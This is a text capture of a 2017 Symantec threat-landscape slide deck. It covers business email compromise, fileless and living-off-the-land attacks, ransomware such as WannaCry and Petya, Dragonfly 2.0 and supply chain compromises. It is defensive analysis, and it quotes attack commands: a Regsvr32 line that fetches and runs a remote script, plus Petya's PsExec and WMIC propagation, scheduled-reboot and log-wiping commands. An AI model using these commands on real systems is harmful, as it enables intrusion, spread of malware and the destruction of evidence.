More Related Content
Similar to Threat landscape update: June to September 2017 (20)
Threat landscape update: June to September 2017
- 2. 2Copyright © 2017 Symantec Corporation
General trends
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies
- 3. 3Copyright © 2017 Symantec Corporation
o More than 2 Million new malware variants per day
o Script malware leads to many variants
Malware statistics Region % of global
USA 27.26%
Japan 6.49%
China 6.04%
India 5.82%
Brazil 4.12%
Germany 3.97%
Great Britain 3.59%
Canada 2.65%
France 2.55%
Russia 2.32%
Australia 2.17%
Italy 2.03%
Mexico 1.67%
South Korea 1.34%
Turkey 1.28%
Netherlands 1.27%
Spain 1.26%
Indonesia 1.11%
Poland 1.08%
Taiwan 0.90%
0.0
10.0
20.0
30.0
40.0
50.0
60.0
70.0
80.0
90.0
100.0
January February March April May June July August
New
malware
variants per
month in
millions
- 4. 4Copyright © 2017 Symantec Corporation
Web attacks still elevated
0
200,000
400,000
600,000
800,000
1,000,000
1,200,000
1,400,000
January February March April May June July August
o Normally no 0-days exploits used
o RIG toolkit is most active
o Link spread by email or
advertisement
o Sometimes infections are
restricted to specific IP addresses
o Supply chain attacks increased
Web attacks blocked per day
- 5. 5Copyright © 2017 Symantec Corporation
Malicious doc containing
macro with social engineering
Malicious documents still common
5
Embedded binary can be
double clicked
- 6. 6Copyright © 2017 Symantec Corporation
o More than half of the malicious attachments are script files
o Macros or JavaScript are usually downloading final payload
o Most common payloads are ransomware and financial Trojans
Email
Email
e.g. invoice or receipt
Attachment
e.g. JavaScript
Downloader
e.g. PowerShell
Payload
e.g. Ransomware
Whitepaper available
- 8. 8Copyright © 2017 Symantec Corporation
4.3
6.8
4.5 5.1
5.9 4.6
0.0
1.0
2.0
3.0
4.0
5.0
6.0
7.0
8.0
Jan Feb Mar Apr May Jun
BEC email received per targeted organization
Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses Oct 2013 – Dec 2016 was over $5bn
o 8,000 businesses targeted monthly
- 9. 9Copyright © 2017 Symantec Corporation
Create a sense of urgency, requiring
immediate action, attempting to
pressure the recipient into action
BEC subject lines
Top three subjects
feature in 2/3 of all
emails
PAYMENT
URGENT
REQUEST
- 10. 10Copyright © 2017 Symantec Corporation
Section
Living off the land
3
Whitepaper available
- 11. 11Copyright © 2017 Symantec Corporation
When attackers turn what you have against you
o Fewer new files on disk
o more difficult to detect attack, no IoC to share
o Use off-the-shelf tools & cloud services
o difficult to determine intent & source
o These tools are ubiquitous
o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting
more difficult
o use simple and proven methods such as email & social
engineering
Living off the land
11
- 12. 12Copyright © 2017 Symantec Corporation
Multiple fileless options exist but not all are truly fileless
Fileless attacks
e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks
Fileless loadpoint
Non-PE files
Dual-use tools
Documents containing macros, PDFs with JavaScript and scripts
(VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things
- 13. 13Copyright © 2017 Symantec Corporation
Living off the land attack chain
Exploit in memory
e.g. SMB EternalBlue
Email with Non-PE file
e.g. document macro
Weak or stolen credentials
e.g. RDP password guess
Incursion
Remote script dropper
e.g. LNK with PowerShell from cloud
Memory only malware
e.g. SQL Slammer
Non-persistent
Persistent
Persistence
Fileless persistence loadpoint
e.g. JScript in registry
Traditional methods
Payload
Regular non-fileless payload
Non-PE file payload
e.g. PowerShell script
Memory only payload
e.g. Mirai DDoS
Dual-use tools
e.g. netsh or PsExec.exe
- 14. 14Copyright © 2017 Symantec Corporation
o Scripts are very common, especially PowerShell
o Many script toolkits available, e.g. PS Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Non-PE files
Whitepaper available
- 15. 15Copyright © 2017 Symantec Corporation
Fileless loadpoints
o Registry run key can point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Downloder.Dromedan (40,000 detections per day)
o Embedded JScript uses WMI to execute a
PowerShell payload
o Script stores encoded DLL in the registry
for later use
Example: Remote SCT load
Malicious.sct file
- 17. 17Copyright © 2017 Symantec Corporation
Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
0
10,000
20,000
30,000
40,000
50,000
60,000
70,000
80,000
90,000
Jan-16
Feb-16
Mar-16
Apr-16
May-16
Jun-16
Jul-16
Aug-16
Sep-16
Oct-16
Nov-16
Dec-16
Jan-17
Feb-17
Mar-17
Apr-17
May-17
Jun-17
Trend Line
Other
Countries
31%
United States
29%
Japan
9%
Italy
8%
India
4%
Germany
4%
Netherlands
3%
UK
3%
Australia
3%
Russia
3%
Canada
3%
- 18. 18Copyright © 2017 Symantec Corporation
o 42% of ransomware infections in 2017 were in enterprises
o Due to WannaCry and Petya
o Attacks against cloud storage increased
Ransomware in enterprises
0
10,000
20,000
30,000
40,000
50,000
60,000
Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17
Consumer Enterprise
- 19. 19Copyright © 2017 Symantec Corporation
o 1 Billion EternalBlue infection attempts blocked
o Profit $140K, Bitcoin accounts emptied August 3rd
o Linked to Lazarus group
WannaCry
0
20000
40000
60000
80000
100000
120000
- 20. 21Copyright © 2017 Symantec Corporation
o Petya (June variant) classified as a wiper
o Semi-targeted infections through supply chain hack (MEDoc)
o Profit $10K, Bitcoin account emptied July 4th
Petya
0
20
40
60
80
100
120
140
160
- 21. 22Copyright © 2017 Symantec Corporation
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o [server_name]admin$perfc.dat
o psexec rundll32.exe c:windowsperfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec fails
o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create
“%System%rundll32.exe “%Windows%perfc.dat" #1 60”
o Scheduled task to restart into the malicious MBR payload
o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traces
o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools
- 23. 24Copyright © 2017 Symantec Corporation
o Active since December 2015 in Europe and North America
o Ongoing attacks against energy sector, mainly in Turkey and U.S.
Infiltration
o Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using Shelter evasion framework
o Various backdoors:
Dragonfly 2.0
• Trojan.Listrix
• Trojan.Credrix
• Backdoor.Goodor
• Backdoor.Dorshell
• Trojan.Karagany.B
• Trojan.Heriplor
Slide deck available
- 24. 25Copyright © 2017 Symantec Corporation
o Uses living off the land tactics
o PowerShell, PsExec, and BITSAdmin
o Phisherly toolkit became available on GitHub in 2016
o Document used SMB template link to leak credentials
o Screenutil and Shelter are available online
Goal
o Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
Dragonfly 2.0
- 25. 26Copyright © 2017 Symantec Corporation
o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through update process
o Trojanized updates are difficult to discover
o Trusted domain, digitally signed, trusted update process,…
Examples:
o MEdoc (Petya June/2017)
o CCleaner (Aug/2017)
o Python modules (Sept/2017)
o ICS supplier (Dragonfly 2014)
Supply chain attacks increasing
- 26. 27Copyright © 2017 Symantec Corporation
o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution
Summary
Editor's Notes
- https://www.symantec.com/security_response/publications/monthlythreatreport.jsp
- https://www.symantec.com/security_response/publications/monthlythreatreport.jsp
- https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/